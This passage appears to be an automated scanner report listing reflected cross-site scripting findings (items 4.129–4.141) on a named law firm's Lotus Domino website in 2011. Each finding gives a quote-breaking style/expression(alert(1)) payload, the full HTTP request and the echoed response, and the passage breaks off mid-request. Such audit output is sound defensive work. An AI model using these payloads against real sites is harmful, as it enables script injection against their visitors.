This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/indexbf370"style%3d"x%3aexpression(alert(1))"4fa2751b636?openform HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:30 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9278
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - indexbf370"style="x:expression(alert(1))"4fa2751b636">
...[SNIP]...

4.129. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64fac"style%3d"x%3aexpression(alert(1))"7790debee61 was submitted in the REST URL parameter 3. This input was echoed as 64fac"style="x:expression(alert(1))"7790debee61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web64fac"style%3d"x%3aexpression(alert(1))"7790debee61/br.nsf/home_btn_01ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web64fac"style="x:expression(alert(1))"7790debee61/br.nsf/home_btn_01ov.jpg">
...[SNIP]...

4.130. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26672"style%3d"x%3aexpression(alert(1))"fe0666a8b66 was submitted in the REST URL parameter 4. This input was echoed as 26672"style="x:expression(alert(1))"fe0666a8b66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf26672"style%3d"x%3aexpression(alert(1))"fe0666a8b66/home_btn_01ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf26672"style="x:expression(alert(1))"fe0666a8b66/home_btn_01ov.jpg">
...[SNIP]...

4.131. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f2da"style%3d"x%3aexpression(alert(1))"0fe406f8278 was submitted in the REST URL parameter 5. This input was echoed as 4f2da"style="x:expression(alert(1))"0fe406f8278 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_01ov.jpg4f2da"style%3d"x%3aexpression(alert(1))"0fe406f8278 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_01ov.jpg4f2da"style="x:expression(alert(1))"0fe406f8278">
...[SNIP]...

4.132. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc8e"style%3d"x%3aexpression(alert(1))"ace1f519915 was submitted in the REST URL parameter 3. This input was echoed as acc8e"style="x:expression(alert(1))"ace1f519915 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/webacc8e"style%3d"x%3aexpression(alert(1))"ace1f519915/br.nsf/home_btn_02ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - webacc8e"style="x:expression(alert(1))"ace1f519915/br.nsf/home_btn_02ov.jpg">
...[SNIP]...

4.133. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66197"style%3d"x%3aexpression(alert(1))"8bf47abd841 was submitted in the REST URL parameter 4. This input was echoed as 66197"style="x:expression(alert(1))"8bf47abd841 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf66197"style%3d"x%3aexpression(alert(1))"8bf47abd841/home_btn_02ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf66197"style="x:expression(alert(1))"8bf47abd841/home_btn_02ov.jpg">
...[SNIP]...

4.134. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7644"style%3d"x%3aexpression(alert(1))"ce851a25267 was submitted in the REST URL parameter 5. This input was echoed as f7644"style="x:expression(alert(1))"ce851a25267 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_02ov.jpgf7644"style%3d"x%3aexpression(alert(1))"ce851a25267 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_02ov.jpgf7644"style="x:expression(alert(1))"ce851a25267">
...[SNIP]...

4.135. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1716"style%3d"x%3aexpression(alert(1))"4084a5490db was submitted in the REST URL parameter 3. This input was echoed as e1716"style="x:expression(alert(1))"4084a5490db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/webe1716"style%3d"x%3aexpression(alert(1))"4084a5490db/br.nsf/home_btn_03ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - webe1716"style="x:expression(alert(1))"4084a5490db/br.nsf/home_btn_03ov.jpg">
...[SNIP]...

4.136. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba47c"style%3d"x%3aexpression(alert(1))"c28d4b74f4a was submitted in the REST URL parameter 4. This input was echoed as ba47c"style="x:expression(alert(1))"c28d4b74f4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsfba47c"style%3d"x%3aexpression(alert(1))"c28d4b74f4a/home_btn_03ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsfba47c"style="x:expression(alert(1))"c28d4b74f4a/home_btn_03ov.jpg">
...[SNIP]...

4.137. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a767"style%3d"x%3aexpression(alert(1))"548deb48dd4 was submitted in the REST URL parameter 5. This input was echoed as 3a767"style="x:expression(alert(1))"548deb48dd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_03ov.jpg3a767"style%3d"x%3aexpression(alert(1))"548deb48dd4 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:42 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_03ov.jpg3a767"style="x:expression(alert(1))"548deb48dd4">
...[SNIP]...

4.138. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52af3"style%3d"x%3aexpression(alert(1))"cdf88022cf4 was submitted in the REST URL parameter 3. This input was echoed as 52af3"style="x:expression(alert(1))"cdf88022cf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web52af3"style%3d"x%3aexpression(alert(1))"cdf88022cf4/br.nsf/home_btn_04ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web52af3"style="x:expression(alert(1))"cdf88022cf4/br.nsf/home_btn_04ov.jpg">
...[SNIP]...

4.139. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de641"style%3d"x%3aexpression(alert(1))"3bc42b14411 was submitted in the REST URL parameter 4. This input was echoed as de641"style="x:expression(alert(1))"3bc42b14411 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsfde641"style%3d"x%3aexpression(alert(1))"3bc42b14411/home_btn_04ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsfde641"style="x:expression(alert(1))"3bc42b14411/home_btn_04ov.jpg">
...[SNIP]...

4.140. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ececd"style%3d"x%3aexpression(alert(1))"52b48d08320 was submitted in the REST URL parameter 5. This input was echoed as ececd"style="x:expression(alert(1))"52b48d08320 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_04ov.jpgececd"style%3d"x%3aexpression(alert(1))"52b48d08320 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:42 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_04ov.jpgececd"style="x:expression(alert(1))"52b48d08320">
...[SNIP]...

4.141. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceaaf"style%3d"x%3aexpression(alert(1))"ff30546ad01 was submitted in the REST URL parameter 3. This input was echoed as ceaaf"style="x:expression(alert(1))"ff30546ad01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/webceaaf"style%3d"x%3aexpression(alert(1))"ff30546ad01/br.nsf/home_btn_05ov.jpg HTTP/1.1
Host: www.butlerrubin.com
